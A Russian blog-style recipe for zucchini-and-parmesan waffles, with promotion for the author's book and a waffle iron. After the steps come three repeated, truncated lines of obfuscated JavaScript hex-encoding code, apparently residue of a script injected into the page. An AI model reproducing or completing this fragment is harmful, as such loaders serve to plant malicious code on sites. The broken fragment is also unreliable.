Вафли из кабачка
Полезная альтернатива кабачковым оладьям!
Если у вас есть вафельница, этим летом вы точно влюбитесь в эти потрясающие закусочные вафли, точно вам говорю! Кстати на оладьи результат не похож совсем, вафли совсем другие по текстуре, более плотные, и совсем не жирные, ведь на масле они не жарятся. И пармезан в них конечно главная фишка, именно он дает этот потрясающий вкус «умами», что и приправ никаких не надо. Вместо пармезана можно взять любой твердый ароматный сыр-грана падана, пекорино, грюйер, что-то такое, ароматное, соленое и насыщенное. И не солите тесто для вафель, сыр все сделает. Сметана на мой вкус тут не нужна, а вот свежий укроп или еще лучше, его молодые зонтики будут очень кстати!
Рецепты самых необычных и самых вкусных вафель в моей новой книге«Блины,оладьи. вафли»,спешите купить с автографом!
А готовить вафли мне как всегда помогала вафельница SM703BK от «Gorenje»
Ингредиенты:
1.Кабачки молодые 700 грамм
2.Яйцо 2 шт.
3.Пармезан 40 грамм
4.Молоко 50 мл.
5.Мука 4 ст.л.
6.Перец черный
7.Растительное масло для смазывания вафельницы
8.Соль
Готовим!
1.Кабачки вымыть и натереть накрупной терке. Сложить в дуршлаг, присыпать солью и оставить на 30 минут. Промыть холодной водой от соли и очень тщательно отжать от жидкости. При этом масса конкретно уменшится в объеме.
2.В кабачковую массу добавить половину натертого сыра, яйцо, молоко,муку и молотый черный перец. Разогреть вафельницу, смазать маслом и жарить толстенькие ,золотистые вафли . Посыпать горячие вафли оставшимся пармезаном и подавать горячими.
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o